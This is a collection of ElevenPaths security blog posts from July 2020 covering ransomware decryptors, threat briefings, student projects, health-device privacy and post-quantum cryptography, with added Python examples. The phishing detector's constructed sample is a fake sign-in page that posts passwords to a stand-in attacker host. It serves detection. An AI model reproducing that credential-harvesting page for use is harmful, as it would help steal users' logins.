4th Anniversary of No More Ransom: ElevenPaths, Partner Entity with Two Tools

Innovation and Laboratory Area in ElevenPaths    27 July, 2020

The No More Ransom Project celebrates its fourth anniversary today after helping over 4.2 million visitors recover from a ransomware infection and saving an estimated $632 million in ransom payments. ElevenPaths is part of this project with two tools.

No More Ransom was created on 25 July 2016 through an alliance between the Dutch National Police, Europol, Kaspersky and McAfee (then Intel Security). Today the project has more than 150 partners worldwide, united in the aim of preventing and mitigating ransomware attacks, which continue to make headlines and hit businesses, governments and individuals around the world.

The platform www.nomoreransom.org has two clear objectives: on the one hand, to support ransomware victims in recovering their encrypted information without paying the criminals; on the other, to pursue those responsible for these scams through legal channels by sharing information with law enforcement. ElevenPaths contributes its experience by developing and offering two free tools to the initiative. Thanks to the efforts of the Innovation & Labs area, we are one of the project's 16 partner entities, alongside Avast, Bitdefender, CERT Polska, Check Point and Emsisoft, among others.

Popcorn Decryptor and VCryptor Decryptor: Our Tools

RecoverPopCorn is a utility developed by the ElevenPaths Innovation Area to recover files encrypted by the PopCorn ransomware. This contribution made us one of the project's partners.

In June 2020 we created another tool, this time against the VCryptor ransomware. Detected by several antivirus vendors, this malware moves the user's files (desktop, documents, images, etc.) into a password-protected ZIP archive and leaves .vcrypt files behind, which are used to demand the ransom.

Cybersecurity Weekly Briefing July 18-24

ElevenPaths    24 July, 2020

New Emotet Campaign after 5 Months of Inactivity

After five months of inactivity, Emotet is back with a massive wave of spam, including reply-chain and fake payment emails, that carries malicious Word document attachments aimed at users all over the world. Researcher Joseph Roosen reported that the botnet was sending large volumes of spam whose malicious documents use updated URLs, commonly pointing at compromised WordPress sites. Once a victim is infected, the malware deploys further modules that steal the victim's mail, spread to other computers on the network, or use the infected computer to send more spam.

More: https://blog.malwarebytes.com/trojans/2020/07/long-dreaded-emotet-has-returned/

Ransomware Incident against Blackbaud

Blackbaud, a software and cloud services provider, has reported suffering a ransomware incident attributed to an as yet unidentified group. According to the company, in May attackers intruded on its internal network with the aim of deploying ransomware. The security team prevented the encryption of Blackbaud's files by expelling the intruders from the network; however, before being locked out, the attackers stole information belonging to a subset of customers, who have already been notified. The attackers then threatened to publish the stolen information unless a ransom was paid, and the company has stated that it met the demand and paid for the data to be deleted. This incident follows the current trend of double extortion in ransomware attacks: the information is not only encrypted but also exfiltrated, and the ransom is demanded both to decrypt it and to keep the files from being published.

More: https://www.blackbaud.com/securityincident

Exploit for RCE Vulnerability in SharePoint

Security researcher Steven Seeley has published details of how the critical vulnerability CVE-2020-1147 can be exploited against SharePoint to achieve remote code execution from a low-privileged authenticated user account. Seeley shows that a DataSet whose XML schema carries type information can be abused to drive deserialization through the "LosFormatter.Deserialize" method: a base64-encoded LosFormatter gadget payload is generated and embedded in the DataSet XML submitted to the SharePoint server, which deserializes it and executes the attacker's code. Because the flaw lies in how .NET handles DataSet and DataTable deserialization, other .NET applications that deserialize untrusted DataSet XML are affected as well, so organisations without SharePoint Server can still be impacted by this bug.

More: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html

Phishing Campaigns on Cloud Services

Check Point's research team has published a report warning about the use of public cloud services such as Google Cloud or Microsoft Azure to host phishing campaigns. In January 2020, researchers detected a PDF document on Google Drive that linked to a phishing page hosted on Google's own servers. The attackers spoofed a SharePoint login page requesting personal or corporate credentials in order to exfiltrate them. Throughout these stages users see nothing suspicious, since the phishing page is hosted on Google Cloud Storage and served over HTTPS with a valid certificate. One way to identify these scams was to view the page's source code, which revealed that most of its resources were loaded from a domain belonging to the attackers. However, more recent attacks show that threat actors have started using Google Cloud Functions, a service that runs code in the cloud, to hide their own malicious domains behind Google-owned ones.

More: https://blog.checkpoint.com/2020/07/21/how-scammers-are-hiding-their-phishing-trips-in-public-clouds/
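The source-code check the Check Point researchers describe can be automated. The following is an added example written for this briefing, not code from Check Point or from the original post: it parses a page with Python's html.parser, counts the hosts from which resources are loaded or to which forms post, and flags a form with a password field that posts to a host other than the one serving the page. The page URL, the bucket name, the domain cdn.attacker.example and the HTML itself are constructed for the example.

```python
from collections import Counter
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urljoin, urlsplit

# Attributes through which a page pulls in resources or sends form data.
RESOURCE_ATTRS = ("src", "href", "action", "data-src")


class _Collector(HTMLParser):
    """Gathers every resource URL and every form as (action URL, has password field)."""

    def __init__(self, base_url: str) -> None:
        super().__init__()
        self.base_url = base_url
        self.urls: List[str] = []
        self.forms: List[Tuple[str, bool]] = []
        self._form: List = []          # [action, has_password] while inside a <form>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        for name in RESOURCE_ATTRS:
            if a.get(name):
                self.urls.append(urljoin(self.base_url, a[name]))
        if tag == "form":
            self._form = [urljoin(self.base_url, a.get("action") or ""), False]
        elif tag == "input" and self._form and (a.get("type") or "").lower() == "password":
            self._form[1] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._form:
            self.forms.append((self._form[0], self._form[1]))
            self._form = []


def _host(url: str) -> str:
    return (urlsplit(url).hostname or "").lower()


def external_resources(page_url: str, html: str) -> Counter:
    """Hosts other than the hosting one that the page loads from or posts to, with counts."""
    c = _Collector(page_url)
    c.feed(html)
    own = _host(page_url)
    return Counter(h for h in map(_host, c.urls) if h and h != own)


def credential_form_offsite(page_url: str, html: str) -> bool:
    """True if a form containing a password field posts to a host other than the page's."""
    c = _Collector(page_url)
    c.feed(html)
    own = _host(page_url)
    return any(has_pw and _host(action) != own for action, has_pw in c.forms)


# Constructed sample modelled on the campaign described above: a fake SharePoint
# sign-in page in a public bucket (hypothetical name) that loads its assets from,
# and posts credentials to, an attacker-controlled host (hypothetical domain).
SAMPLE_PAGE_URL = "https://storage.googleapis.com/hypothetical-bucket/login.html"
SAMPLE_HTML = """<html><head><title>Sign in to your account</title>
<link rel="stylesheet" href="https://cdn.attacker.example/sp/login.css">
<script src="https://cdn.attacker.example/sp/collect.js"></script>
</head><body>
<img src="/hypothetical-bucket/img/logo.png">
<form method="post" action="https://cdn.attacker.example/sp/submit.php">
  <input type="email" name="user"><input type="password" name="pwd">
  <input type="submit" value="Sign in">
</form></body></html>"""

if __name__ == "__main__":
    print("External hosts:", dict(external_resources(SAMPLE_PAGE_URL, SAMPLE_HTML)))
    print("Credential form posts off-site:",
          credential_form_offsite(SAMPLE_PAGE_URL, SAMPLE_HTML))
```

Run as a script it prints the external hosts and the verdict. Applied to the newer variant of the campaign, where the form action is a Cloud Functions URL, the check still reports a cross-host credential form, but the foreign host now belongs to Google rather than to the attackers, which is exactly why the attribution clue the researchers relied on has weakened.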

Emotet Botnet Is Spreading QakBot Malware

Cryptolaemus has reported that Emotet has recently started distributing QakBot malware. The campaign uses e-mail as the attack vector, with the malware hidden in malicious documents. In recent days the Malwarebytes team warned of a new Emotet campaign after five months of inactivity; Emotet has traditionally been linked to the distribution of another malicious tool, TrickBot. This new finding could indicate a shift towards distributing QakBot, as Cryptolaemus reports the absence of TrickBot in the most recent Emotet attacks. The researchers also note that Emotet has changed its distributed payload before, although not frequently; one such change was observed last year, so it is considered likely that TrickBot will be distributed again in the future and the traditional attack methodology will resume.

More: https://twitter.com/Cryptolaemus1/status/1285579090234400769

University and Industry: Talent Is Out There (III)

Innovation and Laboratory Area in ElevenPaths    23 July, 2020

Our supervision of students in different areas of cybersecurity continues to bear fruit. Research, development, and innovation efforts made jointly with students always produce better results than expected, as mutual benefits arise from each collaboration.

On the one hand, the student learns from the tutor's expertise, which guides their work towards a market reality that would otherwise be out of reach. On the other hand, the tutor involved in the progress of the project benefits from the student's support to improve their own skills, encouraging the reskilling and upskilling that an academic project such as a Bachelor's or Master's thesis implies.

Selected Projects

This time we bring two projects corresponding to the 3rd edition of the Master in Cybersecurity of UCAM in collaboration with Telefónica. These are two very different projects that show the wide variety of disciplines coexisting in cybersecurity.

The first is a proposal for an educational space called Ciberaprende, created by Javier García Cambronel, which started as a Master's thesis project and has become a fully operational platform for free training in digital skills. The second is a tool for detecting and classifying private content, developed by Santiago Vallés. The authors describe their projects below.

Ciberaprende

Ciberaprende was conceived as a project designed to last. It is a virtual space whose content can be accessed for free, born of the idea of creating opportunities for a better life through training in digital skills. The space is made up of two clearly differentiated parts.


The first is a free learning platform based on Moodle, with a website built on WordPress as its front page. This part covered the installation, configuration and hardening of the server hosting both the platform and the website, followed by the same work on the website and the platform themselves, focusing largely on hardening but also covering design, search positioning, performance, accessibility and so on.

The second part of the project deals with content. The course created is "Computer Security: Malware" (in Spanish, Seguridad Informática: Malware), 50 hours long and at beginner level. The objectives of the course are:

  • Identify and analyse the existing risks in the field of information security.
  • Learn the main types of malware.
  • Learn the threat posed by malware in all its variants.
  • Discover the consequences of an infection.
  • Learn how to use the protection methods available to protect ourselves.

Within the course, you will find a great deal of content, structured in 5 modules:

  • Module 1: Introduction to security in information systems.
  • Module 2: Introduction to malware.
  • Module 3: Malware, a real and current threat.
  • Module 4: Security strategies against threats.
  • Module 5: Security tools.

And within the contents we find:

  • Over 80 pages of theory.
  • More than 25 learning pills.
  • Over 100 questions.
  • More than 10 interactive activities.
  • More than 5 case studies.
  • 1 satisfaction survey.
  • 1 certificate issued at the end of the course.

Ciberaprende is a project in which a lot of effort and commitment has been invested. During its development many skills were acquired and lessons learned, which not only allowed additional cybersecurity knowledge to be assimilated, but also a better way of disseminating it.

Among the most technical were the hardening of a Linux server with different tools, of a WordPress website and of a Moodle-based platform. On top of that came the challenge of developing an interactive course with a substantial theoretical load and different types of activities and videos to motivate the student.

Ciberaprende has become a functional platform whose future is to keep improving and evolving. As new content is added and other digital skills are tackled, new types of activities and games will be introduced so that skills can be acquired through gamification. It will also be possible to add multimedia content produced specifically for each course and its subject matter.

Software of Detection and Classification of Private Content

Companies own, manage and offer numerous services that process their own information, in many cases automatically. On other occasions the transfer of documentation is done by hand, sending, receiving and checking content of various kinds.

Frequently the information ends up on a web portal, a public repository or some other place used to publish content. It is therefore possible to crawl these public sites, for example with Scrapy, and download every public document.

But how do we know whether sensitive or confidential information about the company or its employees is being leaked? Is there a single tool that addresses this problem? We can use free software to try to solve it, combining two technologies:

  • Regular Expressions
  • Machine Learning
Diagram – System internal process

The idea behind this project is to generate an indicator we call "File Risk", a score that represents how much private information a document leaks. Some examples:

  • Downloading a file containing a single email address is not the same as finding a list of 200 company email addresses. Therefore, we see that we have a factor that impacts on risk and it is the number of occurrences of a type of personal data.
  • Let’s suppose now that we are looking for a number that could match a credit card as a type of data. With only one finding we can consider that this risk is high. Therefore, we propose that the user can give a numerical value to each type of data. We will call this factor “Impact” and it is configurable by the user.

We take as an example a PDF medical report and upload it to the system. After the analysis, we obtain the following table of results:

TYPE          IMPACT   OCCURRENCES   RISK
PERSON             3            20     60
URL                1             2      2
EMAIL              2             0      0
IP                 5             0      0
DNI               50             0      0
SHAREFOLDER       10             0      0
PHONE             10             0      0
CUIL               9             0      0
CREDITCARD        50             0      0
MONEY              3             0      0
Risk table showing the calculation for each type of data (RISK = IMPACT × OCCURRENCES)

You can see that the system found several occurrences of the data type PERSON, which refers to people's names. In addition, a bar chart lets us check the risk per data type at a glance:

Findings by type

The system then computes the file risk as the sum, over all data types, of the number of occurrences found multiplied by the impact assigned to that type:

File Risk = Σ_n ( Impact_n × Occurrences_n )

For the table above this gives 3 × 20 + 1 × 2 = 62.

The system will show the result as “Total File Risk” with a numerical value that corresponds to the previous sum. This value can be used to filter and order hundreds or thousands of files from a website in order to focus on those that have a greater chance of containing private data.

This system therefore combines regular expressions as a static approach, covering the most common data types (national ID, credit card number, etc.), with natural language processing to detect entities such as people's names by comparing the text against a trained machine learning model (using spaCy and scikit-learn).

Beyond this, it can determine whether that set of words makes up a document that falls into a certain category. After analysing the document, the system produces a classification output, shown in the original post as the figure below:

Figure: classification output, with "medicine" as the category with the highest percentage

In this example, if to the category predicted by the model (medicine) we add the names found in the word analysis, there is no doubt that the file is a candidate for review. We are aware that the machine learning model can be improved, but in this case, taking the prediction with the highest percentage, the model gets it right: the file has medical content.

Thanks to this work we could verify the benefits of text classification methods using natural language processing and trained machine learning models. However, for a type of numerical scoring system such as the one implemented here, false positives that can increase the risk value of the file must be considered.
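As an added example (not the student's software nor ElevenPaths code), the following Python script implements the regex half of the design described above: per-type detectors, a user-configurable Impact table, the OCCURRENCES × IMPACT risk table and the total File Risk. It also adds the check a practitioner would want against the false positives mentioned in the last paragraph: credit-card candidates are validated with the Luhn checksum and Spanish DNI candidates with their check letter before they count. The PERSON type, which the project obtains with spaCy named-entity recognition, is left out so that the script runs offline; the sample document, the domains and the impact values are all constructed for the example.

```python
import re
from typing import Callable, Dict, List, Tuple

# "Impact" per data type, the user-configurable factor from the article.
# These weights are assumptions made for this example, not the project's defaults.
IMPACT: Dict[str, int] = {
    "EMAIL": 2, "URL": 1, "IP": 5, "DNI": 50,
    "PHONE": 10, "CREDITCARD": 50, "MONEY": 3,
}

# Static detectors (the regex half of the design). PERSON detection, which the
# project does with spaCy NER, is deliberately left out so the example runs offline.
PATTERNS: Dict[str, re.Pattern] = {
    "EMAIL": re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b"),
    "URL": re.compile(r"\bhttps?://[^\s<>\"']+"),
    "IP": re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b"),
    "DNI": re.compile(r"\b\d{8}[A-HJ-NP-TV-Z]\b"),                  # Spanish ID candidate
    "PHONE": re.compile(r"(?<!\d)(?:\+34[ -]?)?[6-9]\d{2}[ -]?\d{3}[ -]?\d{3}(?!\d)"),
    "CREDITCARD": re.compile(r"(?<!\d)(?:\d[ -]?){13,19}(?!\d)"),    # PAN candidate
    "MONEY": re.compile(r"€\s?\d[\d.,]*|\d[\d.,]*\s?(?:€|EUR|USD)"),
}

DNI_LETTERS = "TRWAGMYFPDXBNJZSQVHLCKE"


def luhn_ok(candidate: str) -> bool:
    """Luhn checksum; rejects digit runs that only look like a card number."""
    digits = [int(c) for c in candidate if c.isdigit()]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def dni_ok(candidate: str) -> bool:
    """Spanish DNI check letter: DNI_LETTERS[number mod 23] must equal the letter."""
    return DNI_LETTERS[int(candidate[:8]) % 23] == candidate[8]


VALIDATORS: Dict[str, Callable[[str], bool]] = {"CREDITCARD": luhn_ok, "DNI": dni_ok}


def scan(text: str) -> Dict[str, List[str]]:
    """Findings per data type, after checksum validation where one exists."""
    findings: Dict[str, List[str]] = {}
    for dtype, pattern in PATTERNS.items():
        check = VALIDATORS.get(dtype)
        findings[dtype] = [h for h in pattern.findall(text) if check is None or check(h)]
    return findings


def risk_table(findings: Dict[str, List[str]],
               impact: Dict[str, int] = IMPACT) -> List[Tuple[str, int, int, int]]:
    """Rows (TYPE, IMPACT, OCCURRENCES, RISK) with RISK = IMPACT * OCCURRENCES."""
    return [(t, w, len(findings.get(t, [])), w * len(findings.get(t, [])))
            for t, w in impact.items()]


def file_risk(findings: Dict[str, List[str]], impact: Dict[str, int] = IMPACT) -> int:
    """Total File Risk = sum over types of Impact_n * Occurrences_n."""
    return sum(row[3] for row in risk_table(findings, impact))


# Constructed sample document (not real data): a medical report containing
# personal data plus one card number that fails Luhn and must not count.
SAMPLE_DOC = """Informe clínico - paciente Ana Pérez (DNI 12345678Z)
Contacto: ana.perez@example.com, tel. +34 612 345 678
Historia disponible en https://intranet.example.com/hc/1234
Servidor de imágenes: 10.20.30.40
Pago con tarjeta 4111 1111 1111 1111, importe 120,50 €
Referencia interna: 4111 1111 1111 1112
Contacto secundario: juan.lopez@example.com
"""


def analyse(text: str = SAMPLE_DOC) -> Tuple[List[Tuple[str, int, int, int]], int]:
    findings = scan(text)
    return risk_table(findings), file_risk(findings)


if __name__ == "__main__":
    rows, total = analyse()
    print(f"{'TYPE':<12}{'IMPACT':>8}{'OCCURRENCES':>13}{'RISK':>6}")
    for dtype, impact, occurrences, risk in rows:
        print(f"{dtype:<12}{impact:>8}{occurrences:>13}{risk:>6}")
    print(f"Total File Risk: {total}")
```

Running the script prints a table in the same layout as the one above and a Total File Risk of 123 for the sample: the second card number is rejected by the Luhn check and therefore does not inflate the score, which is the kind of false positive the closing paragraph warns about.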

Security and Privacy on the “Internet of Health”

Carlos Ávila    21 July, 2020

At the time of writing this article, there are many companies around the world that are innovating, creating and improving various applications, robots and gadgets to monitor our health. In fact, many of these are already a reality and are being sold in the application market and implemented in hospitals around the world.

All these watches with sensors, chips inserted in our bodies, smartphones and other devices are fantastic and store a lot of user data, but is that data being protected? Will it be used to issue diagnoses? What about the security of the software on these devices? And what about surgeries performed by remotely controlled robots?

The Digitization of the Healthcare Industry

We talk about innovation, digitalisation and robotisation in the health industry, and this has led to interesting projects such as the well-known da Vinci surgical robot, one of the most advanced surgical systems in the world, or lesser-known ones such as the microrobot ViRob, designed to clean and drain "pipes" in the body during operations.

But if we talk about common devices accessible to users, we find hearing aids that monitor overall health in real time. In mobile applications, we see how a photograph taken with a phone combined with advanced image processing can detect certain types of skin cancer; Google's GoogLeNet image-classification network, originally developed for general image recognition, has been applied to this problem for some time.

At present it is impossible to keep up with such a large number of devices that generate information and this is no exception for doctors. A doctor can make diagnoses from his experience with several patients, but a computer is currently doing so based on data and comparisons of results that were obtained from hundreds or millions of similar cases.

Health Comes First, As Long As It’s Secure

The data that is processed today by all these gadgets in the health industry needs to be reliable and secure in order to make a reliable diagnosis through analysis. Therefore, the software developments that make these technological devices work must be protected and tested.

The cybersecurity community, as well as security companies in general, have been conducting research on this topic, where they have exposed attack vectors and vulnerabilities on this type of environment. Similarly, the FDA (US Food and Drug Administration) has created guidelines and makes frequent calls to the creators of medical technologies to ensure the security of their products.

The health industry, like many others, depends largely on technology to understand our health status. Each new device we use is likely to share data in some way with other platforms for physician decision-making.

The “Internet of Health”

Just as the “Internet of Things” refers to interconnecting various devices so that in many cases they interact automatically, the “Internet of Health” will perhaps allow all our medical data to be connected together, so that through various systems they can be condensed into a comprehensive report.

We are now at the point where all this data is being stored in environments that should have a level of security that is managed, evaluated and monitored frequently, because decision making will depend on it.

It is really important that we get involved in this problem as a community and as users. Furthermore, governments and regulators need to secure the permanent commitment of every actor in this industry through laws and regulations. That way we will be able to maintain an adequate level of security and feel a little calmer in the face of cyber threats.

Challenges and Business Opportunities of Post Quantum Cryptography

Gonzalo Álvarez Marañón    20 July, 2020

If you're reading this article in a web browser, take a close look at the little lock at the top of the address bar. Click on it. Now click on "Certificates". Finally, select the "Certificate details" tab and look at the value of "Public Key". What do you see? RSA, maybe DSA or even ECDSA. Well, in a few years you'll stop seeing those algorithms. Why? Because quantum computers will have wiped them off the map.

Now look at other secure communication protocols: TLS, responsible for that little lock, which protects web pages and practically everything else; the end-to-end encryption of WhatsApp or Zoom; and so on. Think about digital signatures: contract validation, identification of software authorship, identity verification, proof of ownership in blockchains, etc. Those same algorithms (RSA, DSA, ECDSA) are everywhere, but their days are numbered: 10 or 15 years at most. Will it be the end of privacy? No more secrets? Luckily, no. There is cryptographic life beyond RSA, DSA and ECDSA.

Welcome to the post-quantum future!

Hello, Quantum Computers. Goodbye, Classic Cryptography

Quantum computing is more efficient than classical computing at some tasks, among them solving the mathematical problems (integer factorisation and discrete logarithms, which Shor's algorithm solves in polynomial time) on which the security of today's public-key algorithms for encryption and digital signature rests: RSA, DSA, ECDSA, ECC, DH, etc.

In a world of quantum computers, cryptography requires algorithms based on mathematical problems that are impervious to advances in quantum computing. Fortunately, such cryptographic algorithms have existed for decades. They are collectively known as post-quantum cryptography (PQC). The three best studied alternatives to date are:

  • Hash-based cryptography: as the name suggests, these schemes rely only on secure hash functions, which resist quantum algorithms (Grover's search gives at most a quadratic speed-up, so a larger hash output restores the security margin). Their disadvantage is that they produce relatively long signatures, which limits their use scenarios, and the stateful variants require the signer to keep track of which one-time keys have already been used. The Leighton-Micali Signature scheme (LMS) and Merkle signature schemes are among the strongest candidates to replace RSA and ECDSA for signing.
  • Code-based cryptography: coding theory is the branch of mathematics that deals with error-correcting codes. Decoding a general linear code without knowledge of its secret structure is very hard, requiring exponential time even for a quantum computer. The best studied cryptosystem to date is McEliece's, another promising candidate for key exchange. Its drawback: public keys of the order of a million bits.
  • Lattice-based cryptography: possibly the most active field of research in post-quantum cryptography. A lattice is a discrete set of points in space with the property that the sum of two lattice points is also a lattice point. A hard problem is to find the shortest non-zero vector in a given lattice.

    All known classical algorithms for this problem require time that grows exponentially with the dimension of the lattice, and the same is believed to hold for quantum algorithms. Numerous cryptosystems based on the Shortest Vector Problem exist today; the example that has perhaps attracted the most interest is the NTRU public-key encryption system.
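To make the hash-based trade-off concrete, here is an added example (not from the original article, and far simpler than XMSS or LMS): a Lamport one-time signature built only on SHA-256, extended into a small Merkle signature scheme so that one root public key authorises several one-time keys. It is a teaching implementation written for this page; its parameters (256 pairs of 32-byte secrets per one-time key, a tree of height 3) are choices made for the example, not values from any standard.

```python
import hashlib
import os
from typing import Callable, List, Tuple

H = hashlib.sha256
N = 256       # digest bits -> number of (secret_0, secret_1) pairs per one-time key
SEC = 32      # bytes per secret value

PrivKey = List[Tuple[bytes, bytes]]
PubKey = List[Tuple[bytes, bytes]]
Signature = List[bytes]


def keygen(rng: Callable[[int], bytes] = os.urandom) -> Tuple[PrivKey, PubKey]:
    """Lamport one-time key: 256 pairs of random secrets; public key = their hashes."""
    sk = [(rng(SEC), rng(SEC)) for _ in range(N)]
    pk = [(H(a).digest(), H(b).digest()) for a, b in sk]
    return sk, pk


def _bits(msg: bytes) -> List[int]:
    d = int.from_bytes(H(msg).digest(), "big")
    return [(d >> (N - 1 - i)) & 1 for i in range(N)]


def sign(sk: PrivKey, msg: bytes) -> Signature:
    """For each digest bit reveal the matching secret. Reusing sk leaks the other halves."""
    return [sk[i][b] for i, b in enumerate(_bits(msg))]


def verify(pk: PubKey, msg: bytes, sig: Signature) -> bool:
    """Recompute the digest and check every revealed secret hashes to the published value."""
    return len(sig) == N and all(
        H(s).digest() == pk[i][b] for i, (b, s) in enumerate(zip(_bits(msg), sig)))


def signature_size() -> int:
    return N * SEC            # 8192 bytes; an ECDSA P-256 signature is 64 bytes


def _leaf(pk: PubKey) -> bytes:
    return H(b"".join(a + b for a, b in pk)).digest()


def merkle_keygen(height: int):
    """2**height one-time keys under a single Merkle root (the long-term public key)."""
    keys = [keygen() for _ in range(2 ** height)]
    layer = [_leaf(pk) for _, pk in keys]
    layers = [layer]
    while len(layer) > 1:
        layer = [H(layer[i] + layer[i + 1]).digest() for i in range(0, len(layer), 2)]
        layers.append(layer)
    return keys, layers          # layers[-1][0] is the root


def merkle_sign(keys, layers, index: int, msg: bytes):
    """Sign with leaf `index`. Stateful: the caller must never use an index twice."""
    sk, pk = keys[index]
    auth, idx = [], index
    for layer in layers[:-1]:
        auth.append(layer[idx ^ 1])      # sibling on the path to the root
        idx >>= 1
    return index, pk, sign(sk, msg), auth


def merkle_verify(root: bytes, msg: bytes, msig) -> bool:
    """Check the one-time signature, then rebuild the root from the leaf and auth path."""
    index, pk, sig, auth = msig
    if not verify(pk, msg, sig):
        return False
    node, idx = _leaf(pk), index
    for sibling in auth:
        node = H(node + sibling).digest() if idx % 2 == 0 else H(sibling + node).digest()
        idx >>= 1
    return node == root


if __name__ == "__main__":
    keys, layers = merkle_keygen(3)              # 8 signatures per key pair
    root = layers[-1][0]
    msig = merkle_sign(keys, layers, 5, b"hello post-quantum")
    print("valid:", merkle_verify(root, b"hello post-quantum", msig))
    print("one-time signature bytes:", signature_size(),
          "auth path bytes:", 32 * len(msig[3]))
```

A single Lamport signature is 8192 bytes and its one-time public key 16 KiB, against 64 bytes for an ECDSA P-256 signature; that size, plus the need to track which leaf index has been consumed (signing two messages with the same leaf reveals both halves of some secret pairs and lets anyone forge), is the practical cost the text refers to. XMSS and LMS shrink the sizes with Winternitz chains and hash trees but keep the stateful nature.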

So, if we already have substitutes for RSA, DSA, ECDSA, why not continue with the old algorithms until the first quantum computers capable of breaking them appear, and then switch with a click to the post-quantum ones?

In Cryptography, Births Are Long and Painful

There are four powerful reasons to start working now on the transition to post-quantum cryptography:

  • We need time to improve the efficiency of post-quantum cryptography: to give you an idea, to achieve the security provided by b-bit keys in ECC, post-quantum algorithms may require keys of between b² and b³ bits, so do the maths. Improving efficiency is especially critical for constrained devices, which are widely used in IoT applications and a main target of PQC.
  • We need time to build confidence in post-quantum cryptography: NIST has initiated a process to request, evaluate, and standardize one or more PQC algorithms for digital signature, public key encryption, and session keying. The IRTF Crypto Forum Research Group has completed standardisation of two hash-based signature algorithms, XMSS and LMS, which are also expected to be standardised by NIST.
  • We need time to improve the usability of post-quantum cryptography: these standards should be incorporated into the cryptographic libraries used by the most popular programming languages and by the cryptographic chips and hardware modules.

    The Open Quantum Safe (OQS) project is working on liboqs, an open source C library for PQC algorithms. These will then have to be integrated into cryptographic standards and protocols, such as TLS, X.509, IKEv2, JOSE, etc. OQS is also working on liboqs integrations into OpenSSL and OpenSSH. Then, these standards and protocols should be included by all vendors in their products: from hardware manufacturers, to software manufacturers.
  • We need to protect some secrets for a long time: there is very valuable data with a long life span: employee records, health records, financial records, etc. In the military and industrial fields the need to keep secrets for a long time is even greater. For example, design plans for new weapons or commercial aircraft could be stolen today, encrypted with classical algorithms, and kept until quantum computers can decrypt them, even decades after the theft (the so-called "harvest now, decrypt later" scenario).

In short, we are not yet ready for the world to switch to post-quantum cryptography at the touch of a button.

Will Quantum Cryptography Be The Best Weapon Against Quantum Computers?

Quantum cryptography today boils down to quantum key distribution (QKD): exchanging a random key between two ends with the certainty that any interception attempt will be detected. This key can then be used to encrypt confidential information with a one-time pad (Vernam cipher), which provides perfect secrecy even against a quantum computer.

Not so fast! Unfortunately, QKD has many practical drawbacks that make its adoption inadvisable, at least in the near future:

  • Since QKD protocols do not provide authentication, they are vulnerable to man-in-the-middle attacks in which an adversary negotiates a separate secret key with each of two parties who believe they are communicating with each other.
  • QKD requires specialised and extremely expensive hardware.
  • The distances over which QKD can transmit keys are currently modest: hundreds of kilometres over optical fibre, and of the order of a thousand kilometres only in satellite experiments with very delicate prototypes, far from commercially viable.
  • QKD is used to agree on keys, but not to digitally sign information. Cryptography goes far beyond symmetrical encryption.

In short, for most real-world communications systems out there, PQC will provide an antidote to quantum computing that is more effective and efficient than QKD.

Where Will We See Applications of PQC In The Near Future?

According to the report Post-Quantum Cryptography (PQC): A Revenue Assessment released on the 25th June by the quantum technology analyst firm Inside Quantum Technology, the market for post-quantum cryptography software and chips will soar to $9.5 billion by 2029. While PQC’s capabilities will be incorporated into numerous devices and environments, according to the report, PQC’s revenues will be concentrated in web browsers, IoT, 5G, law enforcement (police, military, intelligence), financial services, health services and the cybersecurity industry itself.

If everyone is aware of the shadow that quantum computing casts over classical cryptography, why aren't they investing more resources in PQC right now? Because all the players are waiting for the NIST (National Institute of Standards and Technology) to complete Round 3 of its PQC standardisation process, expected in 2023.

From that date, services offered by the cybersecurity industry will include NIST-standardised PQC algorithms. For example, Inside Quantum Technology believes that manufacturers will provide PQC offerings as a service for email and VPN. In addition, the cybersecurity industry will recommend, develop, and implement PQC software for their customers. They predict that by 2029 the revenue from PQC-related cybersecurity offerings will likely reach $1.6 billion.

Make The Leap to PQC Before It’s Too Late

If your organization is currently handling encrypted information whose confidentiality needs to be guaranteed for more than 10 years, you’d better take a look at the PQC product offering.

In the meantime, you may want to take a look at the commercial solutions available to your organization to see if they can be put into production. Since you will have to make the leap to PQC sooner or later, it’s best to calmly examine strategies for reducing the costs of technology changeover and preparing for the transition.

Because you can be sure of one thing: the day of the PQC will come.

Cybersecurity Weekly Briefing July 11-17

ElevenPaths    17 July, 2020

Combining Citrix vulnerabilities to steal user sessions

On July 7th, Citrix published a security bulletin fixing 11 vulnerabilities. A few days later, a report with detailed information on these flaws was released together with a proof of concept. Last weekend, new research showed how, by combining three of those 11 vulnerabilities (CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196), an attacker could obtain the session data of currently authenticated users. According to NCC Group researchers, these flaws are being actively exploited: attackers use CVE-2020-8193 to bypass authentication and CVE-2020-8195 or CVE-2020-8196 to steal VPN session data from the device, and other attempts to extract further information from the device have also been observed. For a system to be vulnerable the attacker must be able to reach the appliance's NSIP (management) interface; if that interface is not exposed to the Internet, the risk of exploitation decreases.

More: https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/

SAP patches critical vulnerability

SAP has issued a patch for a critical vulnerability affecting over 40,000 customers running SAP NetWeaver AS Java versions 7.30 to 7.50. The bug, located in the LM Configuration Wizard component, has been assigned CVE-2020-6287 with a CVSS score of 10. Because a web component of the affected software does not require authentication, an unauthenticated attacker can exploit the flaw over HTTP to take full control of the SAP application. The vulnerability is considered critical given that the affected applications are usually exposed to the Internet, so SAP customers should apply the patch as soon as possible.

Link: https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675

Anchor_DNS: New Linux Backdoor

A new report indicates that the developers of the popular TrickBot malware are also responsible for a new version of the Anchor_DNS backdoor for Linux systems. The backdoor, which uses DNS to communicate with its command and control (C2) server, is installed as a cron job and first checks the infected device's public IP address through requests to external URLs. It then transmits information to the attacker-controlled C2 server through DNS queries. The Linux version can also reach Windows hosts on the same network over SMB and IPC$ shares to deploy its Windows counterpart.

Link: https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30

Critical Vulnerability in Windows DNS Server

